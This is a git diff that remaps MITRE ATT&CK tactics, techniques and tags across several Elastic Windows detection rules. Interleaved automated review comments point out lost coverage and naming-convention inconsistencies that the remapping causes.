@@ -125,36 +113,36 @@ process where [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1137" name = "Office Application Startup" reference = "https://attack.mitre.org/techniques/T1137/" + [[rule.threat.technique.subtechnique]] id = "T1137.006" name = "Add-ins" reference = "https://attack.mitre.org/techniques/T1137/006/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/initial_access_exfiltration_first_time_seen_usb.toml b/rules/windows/initial_access_exfiltration_first_time_seen_usb.toml index c85bc4e1719..90fbf00b319 100644 --- a/rules/windows/initial_access_exfiltration_first_time_seen_usb.toml +++ b/rules/windows/initial_access_exfiltration_first_time_seen_usb.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/16" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -84,36 +84,6 @@ event.category:"registry" and host.os.type:"windows" and registry.value:"Friendl ''' -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1091" -name = "Replication Through Removable Media" -reference = "https://attack.mitre.org/techniques/T1091/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1052" -name = "Exfiltration Over Physical Medium" -reference = "https://attack.mitre.org/techniques/T1052/" -[[rule.threat.technique.subtechnique]] -id = "T1052.001" -name = "Exfiltration over USB" -reference = "https://attack.mitre.org/techniques/T1052/001/" - - - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - [rule.new_terms] field = "new_terms_fields" value = ["registry.path"] diff --git a/rules/windows/initial_access_exploit_jetbrains_teamcity.toml b/rules/windows/initial_access_exploit_jetbrains_teamcity.toml index 61e732cb424..51e89480805 100644 --- a/rules/windows/initial_access_exploit_jetbrains_teamcity.toml +++ b/rules/windows/initial_access_exploit_jetbrains_teamcity.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/24" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
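Review bot: The hunk removes both `[[rule.threat]]` entries (T1091 / Initial Access and T1052.001 / Exfiltration) without adding a replacement, so the rule is left with no ATT&CK mapping at all and disappears from coverage reporting for Exfiltration over USB. No `tags` hunk for this file is visible in the patch; if the existing tags still carry `Tactic: Initial Access`, a tag-to-threat consistency check would report it as an orphan tactic tag. If the intent is to keep only mappings the query can evidence, retaining the T1052.001 / TA0010 entry that the removed lines already spell out would preserve the rule's stated purpose.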
@@ -71,20 +71,7 @@ references = [ risk_score = 47 rule_id = "730ed57d-ae0f-444f-af50-78708b57edd5" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Data Source: Elastic Endgame", - "Use Case: Vulnerability", - "Data Source: Elastic Defend", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Windows Security Event Logs", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Discovery", "Tactic: Execution", "Data Source: Elastic Endgame", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Sysmon", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -110,22 +97,58 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + [[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" +[[rule.threat.technique]] +id = "T1057" +name = "Process Discovery" +reference = "https://attack.mitre.org/techniques/T1057/" + +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -136,10 +159,7 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - 
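Review bot: The threat hunk drops T1190 (Exploit Public-Facing Application) and the Initial Access tactic entirely, while the preceding tags hunk keeps `Use Case: Vulnerability` and the rule name and filename still describe a TeamCity exploitation scenario, so a reader of the mapping can no longer tell that the discovery and execution activity listed below is the consequence of exploiting a public-facing application. The same removal of T1190 with `Use Case: Vulnerability` retained occurs in initial_access_potential_webhelpdesk_exploit.toml. If the new convention is to map only what the query itself observes, that rationale belongs in the rule `description` or `note` so the Vulnerability tag and the mapping do not read as contradictory.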
diff --git a/rules/windows/initial_access_potential_webhelpdesk_exploit.toml b/rules/windows/initial_access_potential_webhelpdesk_exploit.toml index 018003de5eb..f9db67a7a6b 100644 --- a/rules/windows/initial_access_potential_webhelpdesk_exploit.toml +++ b/rules/windows/initial_access_potential_webhelpdesk_exploit.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,15 +65,7 @@ references = [ risk_score = 73 rule_id = "a4f7a295-aba1-4382-9c00-f7b02097acbc" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Use Case: Vulnerability", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -92,14 +84,46 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" +[[rule.threat.technique]] +id = "T1129" +name = "Shared Modules" +reference = "https://attack.mitre.org/techniques/T1129/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/initial_access_rdp_file_mail_attachment.toml b/rules/windows/initial_access_rdp_file_mail_attachment.toml index f7ff84102c4..f34cb7ca06e 100644 --- a/rules/windows/initial_access_rdp_file_mail_attachment.toml +++ b/rules/windows/initial_access_rdp_file_mail_attachment.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/11/05" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -68,21 +68,7 @@ references = [ risk_score = 47 rule_id = "f401a0e3-5eeb-4591-969a-f435488e7d12" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Command and Control", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -100,19 +86,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/initial_access_script_executing_powershell.toml b/rules/windows/initial_access_script_executing_powershell.toml index 7ec8d133027..cfc016b1525 100644 --- a/rules/windows/initial_access_script_executing_powershell.toml +++ b/rules/windows/initial_access_script_executing_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -76,19 +76,7 @@ references = ["https://www.elastic.co/security-labs/operation-bleeding-bear"] risk_score = 21 rule_id = "f545ff26-3c94-4fd0-bd33-3c7f95a3a0fc" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne"] timestamp_override = "event.ingested" type = "eql" @@ -105,41 +93,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" -[[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" - - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - 
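Review bot: The threat hunk removes the T1059.005 (Visual Basic) sub-technique together with the Initial Access entry, but the rule name and filename still describe a script host launching PowerShell; if the query continues to match wscript.exe or cscript.exe as the parent, the Visual Basic sub-technique was the more specific mapping and its removal narrows coverage to T1059.001 only. initial_access_scripts_process_started_via_wmi.toml drops the same sub-technique in its second threat hunk. The query itself lies outside this hunk, so this is a point to confirm against it rather than a certain defect.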
diff --git a/rules/windows/initial_access_scripts_process_started_via_wmi.toml b/rules/windows/initial_access_scripts_process_started_via_wmi.toml index 6846a4ea7e0..b11dbd1bfda 100644 --- a/rules/windows/initial_access_scripts_process_started_via_wmi.toml +++ b/rules/windows/initial_access_scripts_process_started_via_wmi.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/27" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,17 +58,7 @@ Windows Management Instrumentation (WMI) is a powerful Windows feature that allo risk_score = 47 rule_id = "b64b183e-1a76-422d-9179-7b389513e74d" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] type = "eql" query = ''' @@ -106,23 +96,7 @@ sequence by host.id with maxspan = 5s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" 
@@ -132,15 +106,8 @@ reference = "https://attack.mitre.org/techniques/T1047/" id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml b/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml index 402f26c77f3..2171b83fa7e 100644 --- a/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml +++ b/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/13" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/13" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -49,15 +49,7 @@ references = [ risk_score = 47 rule_id = "c3d4e5f6-a7b8-6c9d-0e1f-2a3b4c5d6e7f" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -84,34 +76,49 @@ process where host.os.type == "windows" and event.action == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1195" -name = "Supply Chain Compromise" -reference = "https://attack.mitre.org/techniques/T1195/" +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.007" +name = "Msiexec" +reference = "https://attack.mitre.org/techniques/T1218/007/" + [[rule.threat.technique.subtechnique]] -id = "T1195.002" -name = "Compromise Software Supply Chain" -reference = "https://attack.mitre.org/techniques/T1195/002/" +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + [[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" [rule.threat.tactic] id = "TA0002" 
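Review bot: The hunk replaces T1195.002 (Compromise Software Supply Chain) and T1204 with proxy-execution (T1218.005/.007/.011) and interpreter (T1059.001/.003) mappings, so the ATT&CK mapping no longer records the vector the rule is named after, execution originating from a VS Code extension. That is defensible if the convention is to map only behaviour the query observes, but the supply-chain context is then carried solely by the rule name and description; a sentence in `description` stating that the extension is the delivery vector and that the mapping reflects the observed child processes would make the choice explicit. The removal of `Tactic: Initial Access` in the preceding tags hunk is consistent with this change.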
diff --git a/rules/windows/initial_access_suspicious_ms_exchange_files.toml b/rules/windows/initial_access_suspicious_ms_exchange_files.toml index 519fd905a68..9ac8018570c 100644 --- a/rules/windows/initial_access_suspicious_ms_exchange_files.toml +++ b/rules/windows/initial_access_suspicious_ms_exchange_files.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/04" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -48,20 +48,7 @@ references = [ risk_score = 47 rule_id = "6cd1779c-560f-4b68-a8f1-11009b27fe63" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Lateral Movement", - "Data Source: Elastic Endgame", - "Use Case: Vulnerability", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: Elastic Endgame", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" 
@@ -85,26 +72,31 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/initial_access_suspicious_ms_exchange_process.toml b/rules/windows/initial_access_suspicious_ms_exchange_process.toml index 00f178cfbd2..a19fcd489c2 100644 --- a/rules/windows/initial_access_suspicious_ms_exchange_process.toml +++ b/rules/windows/initial_access_suspicious_ms_exchange_process.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/04" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/28" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] 
@@ -73,22 +73,7 @@ references = [ risk_score = 47 rule_id = "483c4daf-b0c6-49e0-adf3-0bfa93231d6b" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Lateral Movement", - "Data Source: Elastic Endgame", - "Use Case: Vulnerability", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Elastic Endgame", "Use Case: Vulnerability", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -122,26 +107,13 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1210" -name = "Exploitation of Remote Services" -reference = "https://attack.mitre.org/techniques/T1210/" - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml b/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml index 28e435a3737..fbd7ead64d2 100644 
--- a/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml +++ b/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/08" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/09/12" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -66,19 +66,7 @@ references = [ risk_score = 73 rule_id = "f81ee52c-297e-46d9-9205-07e66931df26" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Sysmon", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Initial Access", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -94,22 +82,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" 
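Review bot: The reordering in `@@ -94,22 +82,12 @@` makes Execution (T1059) the first `[[rule.threat]]` entry of a file named `initial_access_…`, with the T1190 / Initial Access entry moved to a later hunk. If the suite still derives a rule's primary tactic from its first threat entry and checks it against the filename prefix, this file will fail that check, as will initial_access_webshell_screenconnect_server (Execution first), lateral_movement_alternate_creds_pth (Defense Evasion first) and lateral_movement_cmd_service (Execution first). The rules that lose their named tactic entirely in this diff — the Office child-process, windows_server_update_svc, url_cve_2025_33053, via_explorer and xsl_script_execution_via_com rules lose Initial Access, kerberos_correlation loses Lateral Movement — would need either a rename or a change to that check. Either keep the primary tactic as the first entry and sort only the rest, or state in the PR description that the prefix convention is being dropped.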
@@ -120,10 +98,38 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/initial_access_suspicious_ms_office_child_process.toml b/rules/windows/initial_access_suspicious_ms_office_child_process.toml index 74d8fad8028..f44626289f7 100644 --- a/rules/windows/initial_access_suspicious_ms_office_child_process.toml +++ b/rules/windows/initial_access_suspicious_ms_office_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -77,22 +77,7 @@ references = ["https://www.elastic.co/blog/vulnerability-summary-follina"] risk_score = 47 rule_id = "a624863f-a70d-417f-a7d2-7a404638d47f" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Initial Access", - "Tactic: Defense Evasion", - "Tactic: Execution", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Windows Security Event Logs", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" 
